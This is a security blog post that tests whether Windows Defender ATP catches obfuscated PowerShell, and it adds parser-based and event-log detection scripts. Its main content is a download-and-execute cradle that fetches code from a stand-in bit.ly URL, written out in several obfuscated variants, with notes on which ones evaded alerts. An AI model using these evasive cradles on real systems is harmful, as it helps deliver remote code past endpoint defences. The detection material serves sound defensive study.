Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing this, I wondered whether it was smart enough to see through obfuscated commands, and then how I could obfuscate them to make them harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/sample")

The command simply retrieves the text at the URL and runs it in the current PowerShell session: DownloadString fetches the content and Invoke-Expression executes it, which is why this one-liner is the standard download cradle. WDATP recognises the plain form immediately and flags it. What if we try a few different obfuscation approaches? The examples below are taken from Daniel Bohannon's RVAsec 2017 slides: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

One thing to know before trying them: the back-tick tricks rely on Windows PowerShell 5.1 treating an escape it does not define (`D, `o, `N and so on) as the bare letter, which is also why the random casing below keeps clear of the lowercase escapes `n, `t, `r and `a. PowerShell 6 and later add `e (ESC) and `u{...} (Unicode), so lines that escape a lowercase e or u work on 5.1 but do not run unchanged on PowerShell 7.

Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString("htt" + "ps://" + "bit.ly/sample")

Invoke-Expression (New-Object Net.WebClient).DownloadString('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"('htt' + 'ps://' + 'bit.ly/sample')


Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('htt' + 'ps://' + 'bit.ly/sample')

Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')


Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d")."`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/sample')))


Interestingly, I did not see these get flagged or show up in the console. However, when I ran it this way it did:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/sample')"
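Why the tick-laden forms and this plain one-liner look so different to a string matcher but identical to the engine is easiest to see with the parser itself. The script below is an added example (mine, not code from the post and not part of Invoke-Obfuscation): it hands a command line to the Windows PowerShell 5.1 parser and reads command names, member names and string constants back out of the AST, where the back-ticks are already gone, aliases can be resolved through Get-Alias, and split strings or [char[]] arrays can be folded back together. The sample lines, the alias lookup and the final Suspicious rule (Invoke-Expression or NewScriptBlock together with DownloadString) are my assumptions; the bit.ly URL is the post's made-up one.

```powershell
# The 'using' line has to be the first statement in the script.
using namespace System.Management.Automation.Language

function Get-CommandLineIndicators {
    # Added example: parse a command line with the engine's own parser and report
    # what it will actually run, so tick insertion, random case, string splitting,
    # aliasing and [char[]] arrays no longer hide the download cradle.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [int]$Depth = 0        # recursion guard for recovered strings that are code
    )
    $tokens = $null; $errors = $null
    $ast  = [Parser]::ParseInput($CommandLine, [ref]$tokens, [ref]$errors)
    $seen = [System.Collections.Generic.List[string]]::new()

    # 1. Command names. The tokenizer strips back-ticks from bare words, so
    #    `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N arrives as Invoke-Expression; aliases
    #    such as iex, gcm and gv are resolved through the session's alias table
    #    (assumption: the session still has the default aliases).
    foreach ($cmd in $ast.FindAll({ $args[0] -is [CommandAst] }, $true)) {
        $name = $cmd.GetCommandName()
        if (-not $name) { continue }                  # '& (expr)' has no constant name
        $alias = Get-Alias -Name $name -ErrorAction SilentlyContinue
        if ($alias) { $name = $alias.Definition }
        $seen.Add('cmd:' + $name.ToLowerInvariant())
    }

    # 2. Member names. "`D`o`w`N`l`o`A`d`S`T`R`i`N`g" is a constant string whose
    #    Value is already DownloadString by the time it reaches the AST.
    foreach ($m in $ast.FindAll({ $args[0] -is [MemberExpressionAst] }, $true)) {
        if ($m.Member -is [StringConstantExpressionAst]) {
            $seen.Add('member:' + $m.Member.Value.ToLowerInvariant())
        }
    }

    # 3. Recover strings: plain literals (command and method arguments) ...
    $strings = [System.Collections.Generic.List[string]]::new()
    foreach ($s in $ast.FindAll({ $args[0] -is [StringConstantExpressionAst] }, $true)) {
        $p = $s.Parent
        if ($p -is [BinaryExpressionAst]) { continue }                    # folded below
        if ($p -is [MemberExpressionAst] -and [object]::ReferenceEquals($p.Member, $s)) { continue }
        if ($p -is [CommandAst] -and [object]::ReferenceEquals($p.CommandElements[0], $s)) { continue }
        $strings.Add($s.Value)
    }
    #    ... 'ht' + 'tps://' + 'bit.ly/sample' concatenations (outermost '+' only, so
    #    the nested pieces are not counted twice) ...
    foreach ($b in $ast.FindAll({ $args[0] -is [BinaryExpressionAst] -and $args[0].Operator -eq 'Plus' -and
                                  -not ($args[0].Parent -is [BinaryExpressionAst]) }, $true)) {
        $pieces = @($b.FindAll({ $args[0] -is [StringConstantExpressionAst] }, $true) | ForEach-Object Value)
        if ($pieces.Count) { $strings.Add(-join $pieces) }
    }
    #    ... and [char[]](73,110,...) casts, the output of Invoke-Obfuscation's ASCII encoding.
    foreach ($c in $ast.FindAll({ $args[0] -is [ConvertExpressionAst] -and
                                  $args[0].Type.TypeName.GetReflectionType() -eq [char[]] }, $true)) {
        $codes = @($c.Child.FindAll({ $args[0] -is [ConstantExpressionAst] -and $args[0].Value -is [int] }, $true) |
                  ForEach-Object Value)
        if ($codes.Count) { $strings.Add(-join [char[]]$codes) }
    }

    # 4. A recovered string that is itself code is parsed again, one level down.
    foreach ($str in ($strings | Select-Object -Unique)) {
        if (-not $str) { continue }
        $seen.Add('string:' + $str.ToLowerInvariant())
        if ($Depth -lt 2 -and $str -match '(?i)invoke-expression|\biex\b|downloadstring') {
            $inner = Get-CommandLineIndicators -CommandLine $str -Depth ($Depth + 1)
            foreach ($i in $inner.Indicators) { $seen.Add('inner:' + $i) }
        }
    }

    $u    = @($seen | Select-Object -Unique)
    $flat = $u -replace '^(inner:)+', ''
    [pscustomobject]@{
        Indicators  = $u
        BackTicks   = ([regex]::Matches($CommandLine, '`')).Count   # rare on legitimate command lines
        ParseErrors = @($errors).Count
        # Assumed rule: an evaluator (Invoke-Expression or NewScriptBlock) plus DownloadString.
        Suspicious  = (($flat -contains 'cmd:invoke-expression') -or ($flat -contains 'member:newscriptblock')) -and
                      ($flat -contains 'member:downloadstring')
    }
}

# Constructed samples: the post's plain, "hard" and ASCII-encoded forms (made-up bit.ly URL).
$samples = @(
    'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/sample")'
    '`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( ''ht''+''tps://bit.ly/sample'')'
    '[StRiNg]::JoIn( '''' , [ChaR[]](73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,39,104,116,116,112,58,47,47,98,105,116,46,108,121,47,115,97,109,112,108,101,39,41))|& ((gv ''*MDr*'').NamE[3,11,2]-joiN'''')'
)
foreach ($s in $samples) {
    $r = Get-CommandLineIndicators -CommandLine $s
    '{0,-5} ticks={1,2}  {2}' -f $r.Suspicious, $r.BackTicks, ($r.Indicators -join ' ')
}
```

Run it in a Windows PowerShell 5.1 session. The "hard" form reports the same cmd:invoke-expression and member:downloadstring pair as the plain one, with the run-time lookup of New-Object surfacing as cmd:get-command (a cmdlet discovered by wildcard is worth a rule of its own), and the ASCII encoding is folded into the line it hides and parsed a second time (inner: prefix). The hex and SecureString encodings build their text only at run time, so there is no constant to fold; what they finally hand to Invoke-Expression is only visible once the engine compiles it.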

Even using the Invoke-Obfuscation framework with output like the following did not raise the alert.

ASCII Encoding
[StRiNg]::JoIn( '' , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv '*MDr*').NamE[3,11,2]-joiN'')

HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+'x')(( ( 49, '6e' , 76, '6f','6b', 65,'2d',45 , 78, 70, 72,65 , 73, 73,69, '6f' , '6e' ,20,28,'4e' ,65 , 77, '2d', '4f' ,62, '6a', 65,63 ,74 , 20 , 53 , 79,73 ,74,65,'6d','2e','4e' , 65 ,74 , '2e' , 57,65, 62,43,'6c' ,69, 65,'6e', 74,29 ,'2e', 44 , '6f' , 77, '6e','6c' , '6f' ,61, 64, 53,74 , 72 ,69 , '6e' , 67, 28, 27, 68 , 74,74, 70 , '3a' , '2f' , '2f',62 , 69, 74 ,'2e' , '6c', 79,'2f' ,73, 61 , '6d' , 70 ,'6c',65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin '')

SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+'x')(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($('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'| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing('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'), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+'x'-Join'')
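Whatever the outer layer, all four of these end the same way: the decoded text is handed to Invoke-Expression, reached through the iex alias reassembled from $ShellId, $PSHome, $VerbosePreference or the name of the MaximumDriveCount variable. The engine compiles that text as a fresh script block, and with Script Block Logging turned on it writes the block, decoded, to event 4104 in Microsoft-Windows-PowerShell/Operational, together with the obfuscated outer line that produced it. The script below is an added example (mine, not from the post): it sets the same registry value as the "Turn on PowerShell Script Block Logging" policy and then pulls the 4104 events whose text contains the cradle. The indicator pattern and the use of event-data fields 2 to 4 for the script block text, id and path are my assumptions.

```powershell
# Added example: make the engine record the script blocks it compiles, then pull
# the 4104 events whose decoded text contains the cradle the post's examples hide.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-ScriptBlockLogging {
    # Same value the GPO "Turn on PowerShell Script Block Logging" sets; needs an
    # elevated prompt.
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    Set-ItemProperty -Path $policyKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-DownloadCradleEvents {
    param(
        # Assumed indicator pattern: what the post's encoded examples all decode to.
        [string]$Pattern   = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression',
        [int]   $MaxEvents = 1000
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 event data (assumed layout): [0] MessageNumber, [1] MessageTotal,
            # [2] ScriptBlockText, [3] ScriptBlockId, [4] Path (empty for a block that
            # came from Invoke-Expression rather than a file on disk).
            $text = [string]$_.Properties[2].Value
            if ($text -match $Pattern) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Level   = $_.LevelDisplayName   # Warning: the engine's own suspicious-content flag
                    Part    = '{0}/{1}' -f $_.Properties[0].Value, $_.Properties[1].Value
                    BlockId = $_.Properties[3].Value
                    Path    = $_.Properties[4].Value
                    Text    = $text
                }
            }
        }
}

# Usage (elevated): enable logging, run one of the obfuscated lines from this post,
# then list the blocks. The outer obfuscated line appears once and the decoded
# Invoke-Expression (New-Object ...).DownloadString(...) text appears as its own block.
Enable-ScriptBlockLogging
Get-DownloadCradleEvents | Sort-Object Time | Format-List Time, Level, Path, Text
```

Long blocks are split across several 4104 events, which is what the Part column is for; group by BlockId before matching if the cradle could straddle a boundary. The engine also writes blocks that match its built-in list of suspicious strings at Warning level even before the policy is on, so filtering on Level 3 is a cheap first pass.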

To learn more about obfuscating PowerShell commands, see the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

The good news is that if these were more malicious than just downloading a file, they would be flagged. For example, using this method to download Mimikatz triggers an alert.

Liam Cleary

Liam began his career as a Trainer of all things computer related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. Liam also serves as the Product Owner for Security at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks within SharePoint and Office 365 customizations. His core focus is to identify, control and protect, whether they are full-fledged customizations or out-of-the-box Office 365 functionality. He is also a twelve-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, Raspberry Pi programming, hacking the planet or building Lego robots.
